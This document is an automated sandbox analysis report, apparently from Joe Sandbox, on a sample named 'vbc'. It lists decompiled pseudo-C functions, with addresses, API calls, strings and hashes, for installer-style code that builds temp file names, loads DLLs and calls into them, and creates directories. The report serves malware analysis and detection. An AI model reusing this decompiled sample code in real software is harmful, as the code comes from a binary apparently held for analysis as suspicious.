Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9

Uniqueness

Uniqueness Score: -1.00%

Function 734F1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E734F1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x734f506c = _a8;
				 *0x734f5070 = _a16;
				 *0x734f5074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x734f5048, E734F1651);
				_push(1); // executed
				_t37 = E734F1BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E734F243E(_t54);
					}
					_push(_t54);
					E734F2480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E734F2655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E734F1666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E734F2655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E734F2655();
							_t37 = GlobalFree(E734F1312(E734F1654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E734F2618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E734F15DD( *0x734f5068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E734F2E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E734F2B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E734F2810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x734f1817
0x734f1817
0x734f1817
0x734f1824
0x734f182c
0x734f1839
0x734f1847
0x734f184a
0x734f184c
0x734f1851
0x734f1856
0x734f1978
0x734f1978
0x734f185c
0x734f1860
0x734f1863
0x734f1868
0x734f1869
0x734f186a
0x734f1870
0x734f1876
0x734f18a6
0x734f18ad
0x734f18d1
0x734f191e
0x734f191f
0x734f18d3
0x734f18d3
0x734f18d4
0x734f18dd
0x734f18de
0x734f18e8
0x734f18eb
0x734f18f0
0x734f18f7
0x734f18f7
0x734f18fd
0x734f18fe
0x734f1904
0x734f190a
0x734f1917
0x734f1918
0x734f191b
0x734f18af
0x734f18af
0x734f18b0
0x734f18c5
0x734f18c5
0x734f1929
0x734f192c
0x734f1939
0x734f1940
0x734f1948
0x734f194b
0x734f194b
0x734f1948
0x734f1958
0x734f1960
0x734f1965
0x734f1958
0x734f196d
0x00000000
0x734f196f
0x00000000
0x734f1970
0x734f196d
0x734f187a
0x734f187d
0x734f189b
0x00000000
0x00000000
0x734f189e
0x734f18a3
0x734f18a3
0x734f18a5
0x00000000
0x734f18a5
0x734f187f
0x734f1880
0x734f1888
0x734f1889
0x00000000
0x734f1889
0x734f1882
0x734f1883
0x734f1891
0x00000000
0x734f1891
0x734f1886
0x00000000
0x00000000
0x00000000
0x734f1886

APIs

Part of subcall function 734F1BFF: GlobalFree.KERNEL32(?), ref: 734F1E74
Part of subcall function 734F1BFF: GlobalFree.KERNEL32(?), ref: 734F1E79
Part of subcall function 734F1BFF: GlobalFree.KERNEL32(?), ref: 734F1E7E

GlobalFree.KERNEL32(00000000), ref: 734F18C5
FreeLibrary.KERNEL32(?), ref: 734F194B
GlobalFree.KERNEL32(00000000), ref: 734F1970

Part of subcall function 734F243E: GlobalAlloc.KERNEL32(00000040,?), ref: 734F246F

Part of subcall function 734F2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,734F1896,00000000), ref: 734F28E0

Part of subcall function 734F1666: wsprintfW.USER32 ref: 734F1694

Strings

, xrefs: 734F1951

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: f4aa0f7c9f0489e4ae492ae03759b1d2c527aa83a6eadd22a49edea80f9966f4
Instruction ID: 901bd6854243c6da76049475d0ff8a2e94d85496216772a9058b0745b2eb723c
Opcode Fuzzy Hash: f4aa0f7c9f0489e4ae492ae03759b1d2c527aa83a6eadd22a49edea80f9966f4
Instruction Fuzzy Hash: 0241B475400347AFEB0D9F24D984F9537BCEF04314F1C4469E91BAA2C6DB788184CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406039 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406039(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040603f
0x00406045
0x00406046
0x00406046
0x0040604b
0x0040604c
0x0040604f
0x00406054
0x00406057
0x00406061
0x0040606e
0x00406072
0x0040607a
0x00000000
0x00000000
0x0040607e
0x00000000
0x00406080
0x00406080
0x00406080
0x00406083
0x00406086
0x00406086
0x00406089
0x00000000

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406057
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406072

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040603E
nsa, xrefs: 00406046

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-4262883142
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x7a8b20");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406956(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040557C(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B69( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
Part of subcall function 0040557C: lstrcatW.KERNEL32 ref: 004055D7
Part of subcall function 0040557C: SetWindowTextW.USER32 ref: 004055E9
Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 688cee1cde8ba92b562b3ba80e2bde83ced805693af450c3221be772be186c94
Instruction ID: 444e3b163f15bd358be0b4800c507c2147bc3560cfb58e26f6c7225f93e15a3b
Opcode Fuzzy Hash: 688cee1cde8ba92b562b3ba80e2bde83ced805693af450c3221be772be186c94
Instruction Fuzzy Hash: D621D471904104FACF11AFA5CF48E9E7A71BF48354F20413BF505B91E1DBBD8A929A1D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce28; // 0x9fce50
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E00406557(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce28; // 0x9fce50
						 *_t34 = _t12;
						 *0x40ce28 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x9fce54
							E0040651A(_t30, _t3);
							_push(_t33);
							 *0x40ce28 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E0040651A(_t32, _t33 + 4);
								_t22 =  *0x40ce28; // 0x9fce50
								E0040651A(_t36, _t22 + 4);
								_t25 =  *0x40ce28; // 0x9fce50
								_push(_t32);
								_push(_t25 + 4);
								E0040651A();
								L15:
								 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00406557(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B7A();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b9b
0x00401b9b
0x00401b9e
0x00401ba6
0x00401bef
0x00401c1d
0x00401c26
0x00401c28
0x00401c2c
0x00401c31
0x00401c36
0x00401c38
0x00401bf1
0x00401bf3
0x0040292e
0x00401bf9
0x00401bf9
0x00401bfe
0x00401c05
0x00401c06
0x00401c0b
0x00401c0b
0x00401bf3
0x00000000
0x00401ba8
0x00401ba8
0x00401ba8
0x00401bab
0x00000000
0x00000000
0x00401bb1
0x00401bb5
0x00000000
0x00401bb7
0x00401bb9
0x00000000
0x00401bbf
0x00401bbf
0x00401bc2
0x00401bc9
0x00401bce
0x00401bd8
0x00401bdd
0x00401be2
0x00401be6
0x00402a94
0x00402c2a
0x00402c2d
0x00402c33
0x00402c33
0x00401bb9
0x00000000
0x00401bb5
0x0040238a
0x00402397
0x00402398
0x0040239d
0x0040239d
0x00402c35
0x00402c39

APIs

GlobalFree.KERNEL32(009FCE50), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D

Part of subcall function 00406557: lstrcatW.KERNEL32 ref: 004066FC
Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: Call
API String ID: 3292104215-1824292864
Opcode ID: b890c972c8bf46be985b92796f08af71a41c27e005c5bd4be6b96cad305d66d6
Instruction ID: 26dbd5a77eb58e605bfe28f9d4715249581a5b1b61a00b50ad00dbbd18183bd9
Opcode Fuzzy Hash: b890c972c8bf46be985b92796f08af71a41c27e005c5bd4be6b96cad305d66d6
Instruction Fuzzy Hash: CE219373904210EBD721AFA4DEC4A9E73A4EB08328715453BF542F72D0D6BCA8418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405E94(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E16(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AC8( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AE5(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A4B( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040651A(0x7b4000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405E94: CharNextW.USER32(?), ref: 00405EA2
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A4B: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E

SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: be34f831566008b24982441b18b2d2c73a052184d4bf83d6b95b892da155639b
Instruction ID: b26d59bbbb8bd31aa62bfaa3988508fb5429084e49f4d8f394da2dab55023cb6
Opcode Fuzzy Hash: be34f831566008b24982441b18b2d2c73a052184d4bf83d6b95b892da155639b
Instruction Fuzzy Hash: E611E631504115EBCF216FA5CD40A9F36A0EF15369B28493BF541B52F1DA3E4A819F4D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8a90;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x7a7a4c =  *0x7a7a4c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x7a7a4c, 0x7530,  *0x7a7a34), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
